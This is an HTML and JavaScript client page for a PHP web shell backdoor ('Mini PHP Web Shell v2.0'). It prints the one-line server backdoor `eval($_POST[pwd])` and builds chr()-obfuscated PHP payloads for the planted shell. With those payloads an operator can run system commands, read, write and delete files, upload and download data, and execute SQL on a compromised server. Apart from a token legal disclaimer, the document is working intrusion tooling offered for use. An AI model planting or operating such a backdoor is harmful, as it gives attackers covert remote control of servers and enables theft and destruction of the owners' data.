<!-- codz by Lanker(QQ:18779569)、孟兄(QQ:80607005) 2004/12/22 Modified By Hooligan(QQ:79015166) 2005/06/11-->
<!-- 修改版本解决了专家模式的magic_quote_gpc问题 -->
<HTML>
<HEAD>
<TITLE>lanker微型PHP后门客户端Hooligan修改版</TITLE>
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<style>
<!--
td {font-size:8pt; color: blue;font-family:Verdana}
INPUT {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: blue; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff;FONT-STYLE:;}
textarea {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: blue; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff;}
select {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: blue; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
BODY {font-size:9pt; color: blue;font-family:Verdana; SCROLLBAR-FACE-COLOR: #ffffff; background color:#eeeeee;cursor:SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #aaaaaa; SCROLLBAR-3DLIGHT-COLOR: #aaaaaa; SCROLLBAR-ARROW-COLOR: #dddddd; SCROLLBAR-TRACK-COLOR: #ffffff; SCROLLBAR-DARKSHADOW-COLOR: #ffffff }
a:link {text-decoration:none; color:#336699}
a:visited {text-decoration:none; color:#336699}
a:active {text-decoration:none; color:#336699}
a:hover {COLOR: #b4c8d8; }
.tb {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#cccccc}
.tb0 {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#fcfcfc}
.tb1 {background-color:#ffffff}
-->
</STYLE>
</HEAD>
<BODY style="FONT-SIZE: 9pt" bgcolor="#cccccc">
<CENTER style="cursor:hand;">
<TABLE BORDER="2" ALIGN="center" BGCOLOR="#D6D3CE" style="BORDER-COLOR: #ffffff;">
<TR><TD><CENTER>
lanker微型<FONT color=#ff3300>PHP</font>后门客户端<font color=red>Hooligan修改版</font></font>
</CENTER></TD></TR></TABLE>
<hr size="1" color="#000080">
<FORM ENCTYPE="multipart/form-data" name=frm method=post target="mini">
<FIELDSET style="height:45px;width:100%;font-size:12px">
<LEGEND>服务端信息:</LEGEND>
<TABLE style="FONT-SIZE: 9pt;">
<tr><TD width=800 height=10>
木马地址: <INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid;WIDTH:50%" size=85 value=http://127.0.0.1/mini.php name=act />
登陆密码: <INPUT style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" size=20 type=password value=pwd name=para />
<input type=hidden name='tmpcmd'>
</TD></tr>
</TABLE>
</FIELDSET>
<br />
<FIELDSET style="height:250px;width:100%;font-size:12px">
<LEGEND>程序代码:</LEGEND><br />
<TABLE width="98%">
<tr><TD>
<TABLE style="FONT-SIZE: 9pt" align=left>
<tr width="100%" height=20 align=left><td align=left width=100%>
<select onchange="showDiv(this.value);" width="100%">
<option value="digest">-----------------------------------------------------------基本功能列表-----------------------------------------------</option>
<option value="1" >PHP环境变量</option>
<option value="2" >本程序目录</option>
<option value="3" >执行CMD命令</option>
<option value="6" >读取目录</option>
<option value="14" >创建目录</option>
<option value="15" >删除目录</option>
<option value="4" >上传文件</option>
<option value="5" >读取文件</option>
<option value="12" >创建文件</option>
<option value="7" >复制文件</option>
<option value="8" >重命名文件</option>
<option value="9" >删除文件</option>
<option value="13" >下载文件</option>
<option value="11" >执行SQL语句</option>
<option value="10" >专家模式(自己写代码)</option>
</select></td></tr>
<tr height=260 width="100%" ><TD id="yunxing" align=left width=100%>
LANKER微型PHP后门服务端代码:<br><?php eval($_POST[pwd])?>
<hr size="1" color="#000080"><br>容错代码为:<br><?php @eval($_POST[pwd])?>
</TD></tr>
</TABLE></td>
<td>
</td></tr>
</table>
</FIELDSET>
</form>
<hr size="1" color="#000080">
<CENTER>
<center><font class=font>Mini PHP Web Shell v2.0<br>
-------------Code By <FONT color=#ff3300>lanker</font>、<FONT color=#ff3300>孟兄</font>, Modified By <font color=#ff3300>Hooligan</font> ----------- <br><FONT color=#ff3300>声明:请勿使用本程序从事非法行为,否则后果自负!</font></center>
</BODY></HTML>
<script language="javascript">
function showDiv(aa){
switch(aa)
{
case "1":
yunxing.innerHTML="PHP环境变量<br>"
yunxing.innerHTML+="<p align='center'><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"phpinfo();\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "2":
yunxing.innerHTML="<p align='center'>本程序目录<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"echo dirname(__FILE__);\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "3":
yunxing.innerHTML="<p align='center'><INPUT size=30 name=\"aaaa\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;cmd();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "4":
yunxing.innerHTML="<p align='center'><input NAME='LanKerF' TYPE='file' size=30><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"if (copy($_FILES[LanKerF][tmp_name],$_FILES[LanKerF][name])) echo OK;\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "5":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=50 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send> <br><br><br><br><br><br><br><br><br><br>"
break;
case "6":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=30 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "7":
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=30 name=\"file1\"><br>文件2:<br><INPUT size=30 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;copyfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "8":
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=30 name=\"file1\"><br>文件2:<br><INPUT size=30 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;renamefile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "9":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=30 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;delfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "10":
yunxing.innerHTML="<p align='left'><textarea rows='20' name='duqu' cols='120'>echo \"This is my code!\";</textarea>"
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;mycode();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
break;
case "11":
yunxing.innerHTML="主 机:<input NAME=\"servername\" TYPE=\"text\" value=\"localhost\" size=\"24\" ><BR>数据库:<input NAME=\"dbname\" TYPE=\"text\" value size=\"24\" > <BR>用户名:<input NAME=\"dbusername\" TYPE=\"text\" value=\"root\" size=\"24\" > <BR>密 码:<input NAME=\"dbpassword\" TYPE=\"text\" value size=\"24\" > <BR>SQL语句:<BR><textarea rows=\"8\" name=\"sql\" cols=\"100\" ></textarea>"
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;SQL();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
break;
case "12":
yunxing.innerHTML="<p align='left'>文件名:<INPUT size=30 name=\"filen\"><br>文件内容:<BR><textarea rows=\"16\" name=\"filec\" cols=\"120\" >注意:不支持中文字符!</textarea><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "13":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=30 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;downfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "14":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=30 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "15":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=30 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;rmdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
}
}
function mycode(){
frm.tmpcmd.value="$cmd="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="@eval($cmd);\n"
}
function cmd(){
frm.tmpcmd.value="$cmd="
frm.tmpcmd.value+=duqu(frm.aaaa.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="echo chr(60).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="@system($cmd);\n"
frm.tmpcmd.value+="echo chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
}
function readfile(){
frm.tmpcmd.value="$filename="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$s=chr(60).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="$fp=@fopen($filename,r);\n"
frm.tmpcmd.value+="$contents=@fread($fp, filesize($filename));\n"
frm.tmpcmd.value+="@fclose($fp);\n"
frm.tmpcmd.value+="$contents=htmlspecialchars($contents);\n"
frm.tmpcmd.value+="echo $s.$contents.$e;\n"
}
function readdir(){
frm.tmpcmd.value="$dir="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$f = chr(60).chr(98).chr(114).chr(62);"
frm.tmpcmd.value+="$dir=@dir($dir);"
frm.tmpcmd.value+="if($dir) "
frm.tmpcmd.value+="{"
frm.tmpcmd.value+=" echo path_______.$dir->path.$f;"
frm.tmpcmd.value+=" while($entry=$dir->read())"
frm.tmpcmd.value+=" {"
frm.tmpcmd.value+=" echo ____.$entry.$f; "
frm.tmpcmd.value+=" }"
frm.tmpcmd.value+=" $dir->close();"
frm.tmpcmd.value+="}"
frm.tmpcmd.value+="else"
frm.tmpcmd.value+="{echo 0;}"
}
function SQL(){
frm.tmpcmd.value="$message=chr(102).chr(97).chr(105).chr(108).chr(33);\n"
frm.tmpcmd.value+="$fgf=chr(32);\n"
frm.tmpcmd.value+="$servername="
frm.tmpcmd.value+=duqu(frm.servername.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbusername="
frm.tmpcmd.value+=duqu(frm.dbusername.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbpassword="
frm.tmpcmd.value+=duqu(frm.dbpassword.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbname="
frm.tmpcmd.value+=duqu(frm.dbname.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$sql="
frm.tmpcmd.value+=duqu(frm.sql.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="@mysql_connect($servername,$dbusername,$dbpassword) or die($message);\n"
frm.tmpcmd.value+="@mysql_select_db($dbname) or die($message);\n"
frm.tmpcmd.value+="$result = @mysql_query($sql);\n"
frm.tmpcmd.value+="if($result){\n"
frm.tmpcmd.value+="echo SQL语句成功执行;}\n"
frm.tmpcmd.value+="else{echo 失败.mysql_error();}\n"
frm.tmpcmd.value+="mysql_close();"
}
function createfile(){
frm.tmpcmd.value="$filen="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$filec="
frm.tmpcmd.value+=duqu(frm.filec.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$a=chr(119);\n"
frm.tmpcmd.value+="$fp=@fopen($filen,$a);\n"
frm.tmpcmd.value+="$msg=@fwrite($fp,$filec);\n"
frm.tmpcmd.value+="if($msg) echo chr(79).chr(75).chr(33);\n"
frm.tmpcmd.value+="@fclose($fp);\n"
}
function copyfile(){
frm.tmpcmd.value="$file1="
frm.tmpcmd.value+=duqu(frm.file1.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$file2="
frm.tmpcmd.value+=duqu(frm.file2.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if (@copy($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
}
function renamefile(){
frm.tmpcmd.value="$file1="
frm.tmpcmd.value+=duqu(frm.file1.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$file2="
frm.tmpcmd.value+=duqu(frm.file2.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if (@rename($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
}
function downfile(){
frm.tmpcmd.value="$df="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$f=chr(46);"
frm.tmpcmd.value+="$h=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(116).chr(121).chr(112).chr(101).chr(58).chr(32).chr(97).chr(112).chr(112).chr(108).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(47).chr(120).chr(45);\n"
frm.tmpcmd.value+="$h1=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(68).chr(105).chr(115).chr(112).chr(111).chr(115).chr(105).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(97).chr(116).chr(116).chr(97).chr(99).chr(104).chr(109).chr(101).chr(110).chr(116).chr(59).chr(32).chr(102).chr(105).chr(108).chr(101).chr(110).chr(97).chr(109).chr(101).chr(61);\n"
frm.tmpcmd.value+="$h2=(68).chr(101).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(80).chr(72).chr(80).chr(51).chr(32).chr(71).chr(101).chr(110).chr(101).chr(114).chr(97).chr(116).chr(101).chr(100).chr(32).chr(68).chr(97).chr(116).chr(97);\n"
frm.tmpcmd.value+="$fn = basename($df);\n"
frm.tmpcmd.value+="$fe = $finfo[count($finfo)-1];\n"
frm.tmpcmd.value+="$finfo = explode($f, $fn);\n"
frm.tmpcmd.value+="header($h.$fe);\n"
frm.tmpcmd.value+="header($h1.$fn);\n"
frm.tmpcmd.value+="header($h2);\n"
frm.tmpcmd.value+="@readfile($df);\n"
frm.tmpcmd.value+="header($h2);\n"
frm.tmpcmd.value+="exit;\n"
}
function delfile(){
frm.tmpcmd.value="$filen="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@unlink($filen)) echo chr(79).chr(75).chr(33);"
}
function createdir(){
frm.tmpcmd.value="$dirs="
frm.tmpcmd.value+=duqu(frm.dir.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@mkdir($dirs,0777)) echo chr(79).chr(75).chr(33);"
}
function rmdir(){
frm.tmpcmd.value="$dirs="
frm.tmpcmd.value+=duqu(frm.dir.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@rmdir($dirs)) echo chr(79).chr(75).chr(33);"
}
function returnc(){
alret("document.frm.ifff.value")
}
</script>
<script >
function duqu(zifu){
var duqu="";
for(i=1;i<zifu.length;i++){
duqu+="chr("+zifu.charCodeAt(i-1)+").";
}
duqu+="chr("+zifu.charCodeAt(zifu.length-1)+")";
return duqu
}
</script>
